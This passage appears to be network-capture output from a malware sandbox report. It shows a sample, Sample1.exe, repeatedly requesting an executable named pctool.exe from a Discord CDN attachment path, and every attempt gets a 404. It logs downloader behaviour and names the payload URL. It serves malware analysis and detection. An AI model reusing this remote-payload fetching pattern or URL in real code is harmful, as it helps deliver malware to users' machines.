                        Date: Wed, 15 Jan 2025 14:19:35 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=uprTm3.rdqNDHsGLmXoeD5os31XvUdElGbN8zdVY1Kc-1736950775-1.0.1.1-8lFUhAZQyZh7OJeFDrmmzX9lgLyREqJstLoUqAj4VvNGImKo9My5g.irmmbHQzwyyFRXOqnRKWEf5nESsiTq.A; path=/; expires=Wed, 15-Jan-25 14:49:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nY25hL6k12sD6ARwpu8nhmN4WsuIYJku%2BAHoRiaSrak27R7qZRsCdR3Dag9OWvNKLhd3eNqtaTCuDXuyfxz0cl7NUTmyxGy8gtGGErqosZzNHQgM4NxZYx2KhbYcVdhbhYDSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=B72tlU.oza_HDZg0eHNbSF94ssgzgtXCDrEZP9LxnUE-1736950775812-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026806cab59423d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:35 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.2549738162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:41 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:41 UTC1045INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:41 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=1N7q009Mtt52yC.CZlTkZEXpS8649t56uF_4onAoTt4-1736950781-1.0.1.1-a.rdge3J9PmX3wQfsNh98lNuiaKzg1X34yCoS_LqjRihTDd5GOOuaYzorAWauNg25I0zJIi5Sxriw_ceu6IT1Q; path=/; expires=Wed, 15-Jan-25 14:49:41 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3UWDBRY68vPGsE4igMBEJnQawfCOlfpSToi3e9A3XxkvX6D7BTzeiBA7IolYcgss3uByjGfsODvoKcQeumzXW%2FYic9gBy1%2BdxT7kDPdduG9I8XE8ybrrIvXJNApyRoWiE98lrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=rjQXGKTE85o9vJzb7ELI88RRk.mdgQq43vjhit8C_nY-1736950781451-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026808ff8990caa-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:41 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.2549739162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:46 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:47 UTC1049INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:47 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=MzDQi9ztFHvIdQHiG7Uf.GXAhRJarpmC3nYaRolKKCI-1736950787-1.0.1.1-YTOoZgXtLSXd0vTcuV10zlO3qnEH7Q9QdwPgGXX9eSmb0JNIZ87aK8zcJYe.OGDRpJmZVKHsQXJ2RgS_0GL8Cg; path=/; expires=Wed, 15-Jan-25 14:49:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqnFmQEuhP2VLMBZzQVq%2BVd1iY7f%2BvZFE4QjdCT5wYrQ8Z1DXK3fjctP5iJubR%2Fd1piCVsFBYbPGPuonEj6SzwqDmzfYsz9FxiCilYKRvr%2Bj0wWKwOxFi9W6fmIpjUfJIOyGqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=hnZOMiZFSap9o9bTcGOoDQCDX7fFhWn7E53xyTtKOHw-1736950787105-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680b34bc97d0e-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:47 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.2549740162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:52 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:52 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:52 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=lNKfaC2TEbfMiOwZP7Fxe_lJSEiVta5.xiBHArWvc5Q-1736950792-1.0.1.1-R2V7ERQ5ZNXBBK3_VhxcAdPp2nFYou1CAEhRC2R2h3yQCfXgtrfN0V2EGez1b7Hln17wWUp7E7kT8DrilTR_cA; path=/; expires=Wed, 15-Jan-25 14:49:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0TsyRA2kFJzPjgQAowS34ZbSqXqk54slGKwnefNTDm9yZdZmP2048GHS1tJ%2BjLDgjS9RkXEmUvDqnYCZUVvlATfKRtcNWrNzV9LyEz%2FLrM283qMx08XaxgqVgVZOWW9%2ByDUmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=u5GnG4svosxxoWUNHaxTQfKqDZjIdJkrmKCB_ntVdqM-1736950792739-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680d67e570f64-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:52 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.2549741162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:19:58 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:58 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:58 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=_WvrAmrf.4WF8tWKWd3C.C6FumlTAM9lUTEWFpDIwGQ-1736950798-1.0.1.1-jRs_qSpaGGqtz7RuCPZLMlYSdFUKCOr1GVunT_bLz74_0LCT1zbTLtQNTTrtuCG.h1HwEXvHXZShkqVavSoZVQ; path=/; expires=Wed, 15-Jan-25 14:49:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASiz4XTLCrcPtl9OAg%2F8%2FAMN1KWYzU75wMaIKONAeTlaCMKnJhg61kTeGoYpyhdj6HmUDSJ5JA6hcpt8tkIgbqiEepaixeBKMEcbwsQktl0YNyYzS9FVMJ6jK5lJP4Qw%2FW48GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=sDhtZjVnAi4AE1dr5BdJHo0ey6XaYXxvXXWvMakjUEs-1736950798556-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680faeaf6435c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:58 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.2549742162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:04 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:04 UTC1053INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:04 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=H1Dexhu4JzEUxvyB7YbljRf0G6T2hLVOv3mCtZKwkDQ-1736950804-1.0.1.1-l2xlDpYeV8xBHeX6omdbl.k61dhM7rDOJzcnyFPiQW6zb0KTSCPhajcuYQvbsE0jaZiZpc_PtEHHCBpcD3ENmQ; path=/; expires=Wed, 15-Jan-25 14:50:04 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSlAl%2FNYLXWX7KzhCVePGyxnG%2BiCcpFDygE%2BaYLU3IF86N92jtubWGPO2aXgGFnBeqGgas7WCp5WxeJUebOM0hExbMXiNB0wtYo3EXblGu60Yr%2FodH42LD0ws3QMFr0Xx%2Bt%2Byw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=nRll.bKkLGIMTmiv2QOujFp_OKpcKwKC41BY2F9bp78-1736950804216-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026811e2f6b8c35-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:04 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.2549743162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:09 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:09 UTC1049INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:09 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=ZozhuvHALTBimgv2je7sbcOA.lMIES7H.kZGJgNg8R8-1736950809-1.0.1.1-9meGAXWb1_H_KkFb9_Ae9pYYGEsdk.eq6yFXtzVr249zQ3eu8YbaYW7hd5jBK45Kv73H4eoZABk.uF_rJy9eyw; path=/; expires=Wed, 15-Jan-25 14:50:09 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kx2xAuskwbnyrib%2Bhd24jx%2FN08Pbd52sUwbb7EamwURQqzIS5rUv1WcWDd6ukpMQInZDGXh8hDRVvsXREz%2BDWk9ZiNvvX9wlJkS0n6KNYtiJSi%2BGL90Ui3C8m1TZAvtS0yssMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=K7wT8PTQFP._poRX9gQyZV5Uu_pdd9NBk74CimckA2s-1736950809855-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681417eb10f51-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:09 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.2549744162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:15 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:15 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:15 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=JhWviOr9jA9Mo2J3o36fFs5ezZBL6HKAQrI0NztTRjI-1736950815-1.0.1.1-snVCJZrnhBc4E2x2BhtdEFwI7Fc6xmrHOJhPBT.Guws5pMyOJYeaIKTnAEk.e9ZYT7RPIHizHIhcqQvuJGbz_g; path=/; expires=Wed, 15-Jan-25 14:50:15 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvDSWyOR1msblA8Rfjq39VF%2FJNeTlqB%2Bl2nzll6%2FhkLjy9DsYtkZ2mnmgBwdWQd9kHxDzads0yGNdhEI6yuT32NzKCqVnIbGGWLJDK7PdVcHkL%2Bxua7iuLaV1bV0%2BaR44xS1Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Yk_2NcWuUeBmZMeuhusLDf1IiQpn8NaCk2abqmPC7YU-1736950815552-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681650f7941ad-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:15 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.2549745162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:21 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:21 UTC1049INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:21 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=nqFuALMBfisM3lIVDdsOy_DEkXnf3QE_PLkNSjK9lII-1736950821-1.0.1.1-TwxFchA2.SwIS4oislvu0fxa1n74YYfcKaj.6nGLE7VjLTsrEi6VOHqjn7rnk.H5w7v.VwhGr7cDNKPPCopwsw; path=/; expires=Wed, 15-Jan-25 14:50:21 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W9IbHHFHH3947aZqXOojLAzwt5MmxTsbF2s8iUniVmox0lYwcqqy9DiKnDaRqnK5Ek1761Vvy%2FfpIbCboYEmgj6ESMOuX8BL4paX9nIWX%2FLfMl%2FePH7WNp91a%2FUyCTxKuX572g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=qoQmv4GSljrIDDXGHGqodNFfOl4B01zYcfwlUkwF28c-1736950821170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681883cfb0f83-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:21 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.2549746162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:26 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:26 UTC1047INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:26 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=WYvVTYXajXDWcuHw3QxgDBKSHaxYMlrmQajqIv8.kKs-1736950826-1.0.1.1-N2VSUOMA_UFq9QfSCil0E.jcgU0DrDnHuxW5w2Pp2Oba_Njk2LZbBY2MfghU537Fdd.NdXrmWZjLGITV6wPKCg; path=/; expires=Wed, 15-Jan-25 14:50:26 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0fL2WRRzQdSBdkW6IyzLHjXGnH8R8u31eINGWyicK8laXzm28HpiSB7SeKTeG%2BgVMyg%2F0jXOE33tiyPG5qJDKULyefmF%2BhuzDw2yQKLQOHh0rsdGNrgEnbZBiJGTswaJBi1PYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=vX4_Pypk94h3LEqoVxquaPGB5AUVw81t02JFcmK3zMc-1736950826848-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681ab688172a1-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:26 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.2549747162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:32 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:32 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:32 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=lKCH4U43LyvluZZ1_moWWdMRp9mlmUmNEzQaiSj5h6A-1736950832-1.0.1.1-ly.OBNYNf8kgRJiCLlU2XXUamLdJLFLTbU_nI_jOJ6A_2oKYEVxVGEQwKGdWgqQx5epwRFOWr5VtpE97nBAmWw; path=/; expires=Wed, 15-Jan-25 14:50:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQmT5g4hJ6sT9pOoEMIeTMY7YfaUjKWUauX71ggdgKoA1QuwQ5SNlfHtXZC9%2F3%2F%2Fv%2FZpmeT8bVR828GECqahyvadXupRPRMusO3m%2FqrpgKjOi3AoESOyOHacDKUk7DXYesaBqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=YZTKzOvy_7W0XQ0CU2oHTGRGHCLBEyzdibgKIPNHNsg-1736950832453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681cebd73184d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:32 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.2549748162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:38 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:38 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:38 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=5IVWCrP66ri2uMnu1eOemMOffPzHg55KuVK7HOn_yyQ-1736950838-1.0.1.1-DvEuJKHW0DscPHrbKdLOvCsp0M.g7sTsmSY4TORRPeGkqaW4YFglYFErzIVyvsa5cCzt5PGUt.DUTUyOQVJaJw; path=/; expires=Wed, 15-Jan-25 14:50:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=406pDaN8%2BOqqyr4yECVzUzJMxbwzmRChf27eLqM%2FTFsu%2BVuNX3mWkoO%2BX47%2FE4j0FKZqJF9gnfmiZCfk0gE2fcfyCOeah8cfaIZljShUxazcXxjlsuFKqnz7w2h7HxU0W14ABg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Hi9JTkbN9C2m_.FH4H3EDQdiLs6wVi7emDpNS6P5tWw-1736950838179-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681f28dda0c84-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:38 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.2549749162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:43 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:43 UTC1055INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:43 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=16YvwmwPebmuJUkGnLuc2PVnou1PaOJK_iVXqkB3HIk-1736950843-1.0.1.1-bUKrTMuuO_x0aKZuyV6.qdu6DULuHnrpVV1mS3jcSkRsgisYur2Sn32QdR_nWmGF0FBaR7dSoIkrIR_QPoNbPQ; path=/; expires=Wed, 15-Jan-25 14:50:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8INunvr2tM4M6N6mHgXTMpDrT7WOBUPvINyuVE%2BHzdgrdcx%2F9kgZRUYDc8%2FXp%2FRy%2BnvJXbxNmezh99Fjr9CAEnMZ7VxsulzTNHsa5jfMsiEmb48LwiSbiwyVa5%2BzZTxqd6v%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=WuwZbGzrD1Q2d8iJcO47Hbk41QjRsEBNnae9C4cnO6c-1736950843813-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268215bbeb435d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:43 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.2549750162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:49 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:49 UTC1051INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:49 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=AAOJlr9PoI647ppvdzzfhZwkg2xPM2nmY3gxKq9e.2g-1736950849-1.0.1.1-C6JbSl42EPVOIVijCDsndxhGJG880xMzSAkEzGndRc8kMj3jI5hCEhp.Udlquu.NnYHBptZSEtk7zx0hq8Bklg; path=/; expires=Wed, 15-Jan-25 14:50:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRlQkAQrPZH7FoHw1JPfIqfh5BbdpfCKPial4mjm69rzbglRXKn4%2Fnk2kL%2FGD2WNn4gjY2h5%2F%2BMXq4gLR4LazqmgpIzehxkz1gbYkeC2vJLyis%2FttSdCbHKIhoQV1vILVv5GYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=v9WvJwRlTAdzVuRJsYjILjGl2VLmZwwlI4r4jEUsFVY-1736950849426-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268238ced472a7-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:49 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.2549751162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:20:55 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:55 UTC1055INHTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:55 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
